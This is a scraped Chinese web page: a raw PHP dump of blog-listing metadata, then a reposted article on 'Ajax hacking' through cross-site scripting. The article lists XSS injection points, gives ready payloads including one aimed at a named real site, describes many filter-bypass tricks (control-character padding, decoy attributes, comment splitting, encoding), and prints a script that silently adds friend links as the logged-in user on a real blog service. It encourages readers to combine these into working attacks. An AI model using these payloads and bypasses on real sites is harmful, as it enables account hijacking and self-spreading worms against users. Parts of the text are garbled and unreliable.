array(2) { ["docs"]=> array(10) { [0]=> array(10) { ["id"]=> string(3) "428" ["text"]=> string(77) "Visual Studio 2017 单独启动MSDN帮助(Microsoft Help Viewer)的方法" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(8) "DonetRen" ["tagsname"]=> string(55) "Visual Studio 2017|MSDN帮助|C#程序|.NET|Help Viewer" ["tagsid"]=> string(23) "[401,402,403,"300",404]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511400964" ["_id"]=> string(3) "428" } [1]=> array(10) { ["id"]=> string(3) "427" ["text"]=> string(42) "npm -v;报错 cannot find module "wrapp"" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(4) "zzty" ["tagsname"]=> string(50) "node.js|npm|cannot find module "wrapp“|node" ["tagsid"]=> string(19) "[398,"239",399,400]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511400760" ["_id"]=> string(3) "427" } [2]=> array(10) { ["id"]=> string(3) "426" ["text"]=> string(54) "说说css中pt、px、em、rem都扮演了什么角色" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(12) "zhengqiaoyin" ["tagsname"]=> string(0) "" ["tagsid"]=> string(2) "[]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511400640" ["_id"]=> string(3) "426" } [3]=> array(10) { ["id"]=> string(3) "425" ["text"]=> string(83) "深入学习JS执行--创建执行上下文(变量对象,作用域链,this)" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(7) "Ry-yuan" ["tagsname"]=> string(33) "Javascript|Javascript执行过程" ["tagsid"]=> string(13) "["169","191"]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511399901" ["_id"]=> string(3) "425" } [4]=> array(10) { ["id"]=> string(3) "424" ["text"]=> string(30) "C# 排序技术研究与对比" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(9) "vveiliang" ["tagsname"]=> string(0) "" ["tagsid"]=> string(2) "[]" ["catesname"]=> string(8) ".Net Dev" ["catesid"]=> string(5) "[199]" ["createtime"]=> string(10) "1511399150" ["_id"]=> string(3) "424" } [5]=> array(10) { ["id"]=> string(3) "423" ["text"]=> string(72) "【算法】小白的算法笔记:快速排序算法的编码和优化" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(9) "penghuwan" ["tagsname"]=> string(6) "算法" ["tagsid"]=> string(7) "["344"]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511398109" ["_id"]=> string(3) "423" } [6]=> array(10) { ["id"]=> string(3) "422" ["text"]=> string(64) "JavaScript数据可视化编程学习(二)Flotr2,雷达图" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(7) "chengxs" ["tagsname"]=> string(28) "数据可视化|前端学习" ["tagsid"]=> string(9) "[396,397]" ["catesname"]=> string(18) "前端基本知识" ["catesid"]=> string(5) "[198]" ["createtime"]=> string(10) "1511397800" ["_id"]=> string(3) "422" } [7]=> array(10) { ["id"]=> string(3) "421" ["text"]=> string(36) "C#表达式目录树(Expression)" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(4) "wwym" ["tagsname"]=> string(0) "" ["tagsid"]=> string(2) "[]" ["catesname"]=> string(4) ".NET" ["catesid"]=> string(7) "["119"]" ["createtime"]=> string(10) "1511397474" ["_id"]=> string(3) "421" } [8]=> array(10) { ["id"]=> string(3) "420" ["text"]=> string(47) "数据结构 队列_队列实例:事件处理" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(7) "idreamo" ["tagsname"]=> string(40) "C语言|数据结构|队列|事件处理" ["tagsid"]=> string(23) "["246","247","248",395]" ["catesname"]=> string(12) "数据结构" ["catesid"]=> string(7) "["133"]" ["createtime"]=> string(10) "1511397279" ["_id"]=> string(3) "420" } [9]=> array(10) { ["id"]=> string(3) "419" ["text"]=> string(47) "久等了,博客园官方Android客户端发布" ["intro"]=> string(288) "目录 ECharts 异步加载 ECharts 数据可视化在过去几年中取得了巨大进展。开发人员对可视化产品的期望不再是简单的图表创建工具,而是在交互、性能、数据处理等方面有更高的要求。 chart.setOption({ color: [ " ["username"]=> string(3) "cmt" ["tagsname"]=> string(0) "" ["tagsid"]=> string(2) "[]" ["catesname"]=> string(0) "" ["catesid"]=> string(2) "[]" ["createtime"]=> string(10) "1511396549" ["_id"]=> string(3) "419" } } ["count"]=> int(200) } 222 关于Ajax hacking的一篇文章,看来要完善的东西还有很多啊. - 爱码网
(转:http://www.xdiyer.cn/?id=399) 
  Ajax
hacking这个名词最先出现在Billy Hoffman的一篇名为《AJAX dangers》报告中,他把samy yamanner这种攻击形式定义为AJAX hacking。而在此之前它们只是被说属于web2.0蠕虫(或XSSworm ,但对这种攻击形式并没有一个明确的定义。这里我们暂以AJax hacking中的XSS进行一些深入的性讨论 。关于Ajax的其他攻击形式请到网上参看文章《Top 10 Ajax Security Holes and Driving Factors》或 者是翻译成中文的《细数Web2.0下的十大安全威胁》。

  在传统的XSS 攻击中,我们的目的通常是直接提权或者获取Cookies后提权,所以代码执行方式一般是windows.openwindow.locationiframe,于是它的两大弱点就体现出来了,不具有传播性和易暴 露性。在AJax hacking中利用Ajax这 一种新技术,攻击方式及对象得以转变。其实绝大部分人在获得管理员权限又拥有文件更改权限后所能做的也就是挂马,很少设计商业机密之类!而这一攻击则直接 把矛头指向客户端,由于数据全部是使用异步调取方式,所以具有很强的隐蔽能力;通过操纵已登录的用户权限,可以直接对用户信息进行更改,甚至可以使该代码 集合自动传播实现蠕虫功能。

  XSS 利用方式

  在传播的XSS攻击案例中,代码插入的利用方式一般是在URL和文本区域(textarea)中。但对于日前大面积利用Ajax技术进行建站的站点来说,利用新形式的Ajax hacking技术可以将利用方式大体扩展到URL域、input域、textarea域、embed域、cssrssxml载体七种方式。

  URL XSS

  可以进行XSSURL一般为"(域名)/(文件名)(文件格式)?(字段名)=(字段内容)"这种形式,而且字段内容通常会在页面的某一个位置显示出来或者被调用。由于网站编写者的疏忽,没有把对应的字段内容进行安全检测和过滤,而直接调用到页面上,使得我们只把字段内容替换成我们想要的XSS 代码即产生跨站。比如:

http
://club.sohu.com/joke/1.htm? stra=<script>alert(document.cookie);</script>
  但是这种方式一般需要诱使用户点击你事先伪造的链接,而链接你可以挂在论坛里或者以E-mail 的方式进行钓鱼性欺骗。

  Inputtextarea以及css XSS

  inputtextarea以及css XSS是我们所用到的方式中最广泛的几种,由于css实际上属于Dhtml 一部分,所以它们的利用方式及绕过过滤特点也大体相同,我们将在后面着重进行相关的解释和实验。

  Embed XSS

  Embed XSS一般利用在允许插入视频,音乐以及flash的站点上,如果你链接到一个被恶意构造了含有XSS脚本的flash文件,比如<EMBED SRC="xss.swf"></EMBED>,然后我们构造一个特殊的.swf文件,并在flash文件的动作里插入以Action Script引到的jsvbs代码。当用户访问该页面时既 产生跨站。

  Rss以及Xml XSS

  这种攻击一般利用在可以进行rss聚合的站点以及部分本地的rss解释器上(据说对本地的rss解释器进行XSS,有获得主机权限的可能性,不过本人没有试过这个!),而且由于rss文件一般可以在任何站点上被引用,所以想进行这类的攻击测试是很简单的事情,效果也相当明显。下面是对一个没有进行任何过滤设置的本地调用远程rss.xml的实例效果,以及Google调用该rss的过滤效果。

  代码插入方式

  由于插入的脚本为js或者是vbs,所有一般需要由的关键字JavaScriptVbScriptexpression <IMG SRC="JavaScript:alert('XSS');">,但当接收鼠标或键盘响应时,这三个关键字可以省略掉,所以有以下利用方法 <img onmouseover="alert('XSS')">或者<INPUT onkeyup="alert('XSS');">等等。而且由于html 不遵循xhtml的标准,所以可以有以下插入方式:

1、标签属性可以用双引号、可以用单引号、也可以可不用引号;

2、属性值可以大写;可以小写;也可以混合写;

3、可以插入回车、包括段末结尾符和换行符的两种、即char10)和char13)、tab空格;

4、如果是style形式还可以插入反斜线"\"、注释符"/**/";

5、可以将插入的代码转换成10进制、16进制;

6、由于禁止的不确定性,你插入的进制串可以进行一系列转化并可以随意搭配组合;

7、进字符"
j"就可以有以下15种编码方法,而且还是不计字符的大小写。

\6A\06A\006A\0006A\00006A //java形式的16进制编码

jjjjj //十 进制编码

jjjjj //十 六进制编码

8、其他的编码方式,如htmlEncode和URLEncode对于html及URL的编码。

  至于可以插入代码的html标签嘛……说句近乎疯狂的话——目前几乎所有可以插入属性的标签都 可以插入代码,比如<bstyle="
xss:expression(alert('XSS'))">。

在html标签中可以插入代码的属性一般为:src、style、dynsrc(常用于img和input中,用此属性还可以插入视频等)、 lowsrc(预载缩略图)、鼠标属性(如o n m o u s e o v e r )、键盘属性(如onkeypress)、href属性(常用于a和link)、boby的onload属性、URL属性等。

  过滤绕过方式

  当然人家网站也不可能傻乎乎地让你输入这些代码,所以它们一般会对你输入的字符进行过滤。所以我们编写好的代码并一定就能顺利的插入执行,很有可能某些关键的字符被过滤掉了,比如"
JavaScript"。如果只是这种单纯的过滤,那么绕过方法实在太简单,只要每当输入此字符时输入"javajavascriptscript"之类就可以了。当然网站程序员依然不会这样傻,它们会进行种种过滤来防备你,所以结合上面的"代码插入方式",你可能会总结出以下的绕过网站过滤系统的方法:

  1、用控制字符的ASCII码填充

  比如<IMG SRC="
&#15; JavaScript:alert('XSS');">,如果你熟悉ASCII码,你应该知道系统控制字符一共是33个,这里去掉一个头& #00(null)和一个尾(del),其他31个字符均可以顺利插入代码头部,对过滤系统进行混淆,并且不影响原代码执行,而且你依 然可以用"代码插入方式"中的"方案7"进行编码的任意转换。七种tab符 、换行符 、回车符 可以插到代码 任何地方。

  2、插入混淆属性

  当我们进行一般的文字录入时会发现,并不是所有带"JavaSceipt"这样的字符都会被过滤掉。而是只有在html标签内的特殊字符会被滤掉,这使得我们有了令一套绕过措施,在插入代码的属性前面插入另一混淆属性,并在该属性中插入让过滤系统误以为是标签结束符的字符,从而让过滤系统认为执行代码在html标签的外面。比如:

<img src="abc>" onmouseover="[code]"> //插入混淆的src属 性

<IMG """><SCRIPT>[code]</SCRIPT>"> //插入混 淆的双引号及 ">"符号

<SCRIPT a=">" SRC="xss.js"></SCRIPT> //插入混淆的a 属性

  3、用注释符分割

  由于浏览器会忽略掉每种代码的注释符,因此如果我们在代码中的注释符就可以成功地欺骗过滤 系统并且不影响XSS代码的正常运行。比如:

<img style="xss:expr/*XSS*/ession([code])"> //css的注释符号 为/**/,其中的内容会被忽略

<style>@im\port'\ja\vasc\ript:alert("XSS")';</style> //css中忽略的符号还有"\"

exp
/*<A STYLE='no\xss:noxss("*//*");xss:ex/*XSS*//*/*/pression (alert("XSS"))'> //注释混淆后的样子

<style><!--</style><script>[code]//-- ></script> //html的注释符为<!--注释-->

  4、js编码及调用

  如果过滤系统会过滤掉很多的特征字符,那么当我们做以上绕过的时候就会非常的麻烦,所以典型的绕过方案还有对这些代码进行js编码或者干脆从外部调用过来。当然由于浏览器对Ajax的安全机制,你必须保证调用的文件在相同的服务器上,否则就会出现错误提示。

  异步数据调用

  既然是Ajax hacking,自然需要用到异步的数据调用。这里将简单的介绍一下相关的知识,要更 深入的了解是长期实践的结果。

  1、声明xmlhttprequest对象

  数据调用需要事先声明xmlhttprequest对象,在IE6及以前版本中最简单的做法是:

var XmlHttp=new ActiveXObject("Microsoft.XMLhttp");

  在IE7和firefox中的声明方法是:

var req = new XMLHttpRequest();

  所以如果我们想编出兼容性更好的代码,可以对客户端浏览器进行判断,然后分别定义 xmlhttprequest对象,如下:

if(window.XMLHttprequest){
XmlHttp = new XMLHttpRequest();
}else if (window.ActiveXObject){
Xmlhttp = new ActiveXObject ('
Microsoft.XMLHTTP');
}
  然后采用以下方法进行参数传递

XmlHttp.Open("POST","URL",true);
XmlHttp.send(null);

  这里要主意的是,XmlHttp.Open中的第一个选项为页面的请求方式,可以为post、get、head三种 第三 个选项true表示异步方式、false表示同步方式。

  利用以上代码,你可以简单实现一下在TOM博客中为当前用户添加任意用户的友情链接,如果添加 成功 会返回OK窗口,已经添加会返回friended,代码如下:

<script>
var XmlHttp=new ActiveXObject ("Microsoft.XMLhttp");
XmlHttp.Open("POST","http://blog.tom.com/manage/favorite/friend_list.php? UserName=monyer1&Flag=1",true);
XmlHttp.send(null)
XmlHttp.onreadystatechange=ServerProcess;
function ServerProcess(){
if (Xmlhttp.readystate==4 || XmlHttp.readystate=='
complete')
alert (XmlHttp.responsetext); }
</script>
  利用相同原理,给登录用户添加文章也不是什么难题,只不过稍微麻烦店而已,感兴趣的朋友可 以自 己回去试试。

  V b s c r i p t 中声明xmlhttprequest的代码为这样:

dim httpreq as msxml.xmlhttprequest
set httpreq = new xmlhttprequest
httpreq.setrequesttheader "content- type:","text/xml;charest=gb2312"
httpreq,send
  利用方式与js大体相同,这里不做过多的即时。

  2、获取页面元素

  获取页面指定标签和标签中的值一般会用到以下几个DOM对象,当然对象后面可以加入相关属性, 比如 style、value、innerHTML等等。

1)document. getElementByld //获得制定id的html标签相关信息

2)document. getElementByname //获得指定name的html标签相关信息

3)document. getElementByTagName //获得指定的html标签相关信息

  3、在页面中插入html元素

我指导的可以在页面插入html的js函数有insertAdjacentHTML、innerHTML(outerHTML)、 inserAdjacentText、innerTEXT(outerTEXT)。其中前两个是插入html代码,后两个是插入文本,所以我们一般所用的 就是前两个。另外用document对象中的createlement也可以实现代码插入,输入js代码时 请注意大小写问题。

1) <a href="#" onclick="this.innerHTML='
<h1>i am monyer</h1>' ">innerHTML</a> //替换当前标签中的内容,作用域不包括当前的 html标签

2)<a href="#" onclick="this.outerHTML='
<h1>i am monyer</h1>' ">outerHTML</a> //替换当前标签及标签中的内容,作用域包括当前标签及其中所有内容

3)<a onclick="this.insertAdjacentHTML('
afterEnd',<h1>monyer</h1>')" href="#">insertAdjacentHTML</a> //新增插入的html代码,不改 变原标签及内容

  指定插入html标签语句的地方,有四种值用:

a
.beforeBegin:插入到标签开始标记后

b
.afterBegin:插入到标签开始标记后

c
.beforeEnd:插入到标签结束标记前

d
.afterEnd:插入到标签结束标记后

  灵活地运用这两个函数能帮我们变换出丰富的效果来,我利用百度空间插入视频的简化POC

Html页面的代码为:

<script scr=monyerflash.js></script>
<address>src=http:/ /tv.mofile.com/cn/xplayer.swf?v=9IWKFISE</address>
monyerflash
.js代码为:

windwo
.onload=function(){
var i,j,x,y,z;
j
=document.getElementsByTagName ('address');
for(i=0;i<j.length;i++){
y
=document.getElementsByTagName('address') [i];
z
=document.getElementsByTagName('address') [i]; firstChild.data;
x
='<br/><embed '+z+'></embed>';
if(y) y.insertAdjacentHTML('beforeEnd'.x);
}}
  总结

  有了以上概述,相信你对Ajax hacking with XSS已经有了一个大体的了解,并且只要把文中的响应内容进行简单的组合和更改,就很可能做出某些令人惊喜的东西。当然因为Ajax应用的是JavaScript的一部分,所以想充分利用Ajax式的hacking并发挥它的威力还需要你对JavaScript有一个充分的了解。当你在各个过滤系统间实战时,你会遇到更多的苦难并需要试着解决各种问题。我认为是否真正入侵一个网站或者顺利挂马是次要的,不断提高自己,在功与防的对立统一中不断寻求突破才是王道!

相关文章: